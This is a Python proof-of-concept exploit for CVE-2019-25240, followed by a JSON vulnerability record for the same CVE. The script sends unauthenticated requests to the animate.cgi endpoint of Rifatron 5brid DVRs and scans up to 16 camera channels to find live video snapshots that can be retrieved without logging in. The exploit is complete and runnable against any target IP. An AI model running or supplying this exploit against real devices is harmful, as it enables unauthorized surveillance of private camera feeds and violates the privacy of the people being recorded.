CVE-2019-25240

import requests import sys # CVE-2019-25240 PoC - Rifatron 5brid DVR Unauthenticated Video Access # Target: animate.cgi script in Mobile Web Viewer module def check_vulnerability(target_ip, channel=0): """ Check if target DVR is vulnerable to CVE-2019-25240 Args: target_ip: Target DVR IP address or hostname channel: Camera channel number (default: 0) Returns: bool: True if vulnerable, False otherwise """ # Construct exploit URL for animate.cgi url = f"http://{target_ip}/cgi-bin/animate.cgi" params = {"channel": channel} headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Accept": "*/*" } try: # Send request without authentication response = requests.get(url, params=params, headers=headers, timeout=10) # Check if we received valid image data (video snapshot) if response.status_code == 200: content_type = response.headers.get("Content-Type", "") if "image" in content_type or len(response.content) > 1000: print(f"[+] VULNERABLE: Channel {channel} accessible without auth") print(f"[+] Content-Type: {content_type}") print(f"[+] Response size: {len(response.content)} bytes") return True print(f"[-] Not vulnerable or channel not accessible") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False def exploit_all_channels(target_ip, max_channels=16): """ Exploit CVE-2019-25240 to access all camera channels Args: target_ip: Target DVR IP address max_channels: Maximum number of channels to scan """ print(f"[*] Scanning {target_ip} for accessible channels...") vulnerable_channels = [] for channel in range(max_channels): if check_vulnerability(target_ip, channel): vulnerable_channels.append(channel) print(f"\n[*] Summary: {len(vulnerable_channels)} channels accessible") print(f"[*] Vulnerable channels: {vulnerable_channels}") if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_ip> [max_channels]") print(f"Example: python {sys.argv[0]} 192.168.1.100 16") sys.exit(1) target = sys.argv[1] max_ch = int(sys.argv[2]) if len(sys.argv) > 2 else 16 exploit_all_channels(target, max_ch)

{"cve": {"id": "CVE-2019-25240", "sourceIdentifier": "[email protected]", "published": "2025-12-24T20:15:51.840", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Rifatron 5brid DVR contains an unauthenticated vulnerability in the animate.cgi script that allows unauthorized access to live video streams. Attackers can exploit the Mobile Web Viewer module by specifying channel numbers to retrieve sequential video snapshots without authentication."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "http://www.rifatron.com", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/47368", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5532.php", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/47368", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5532.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}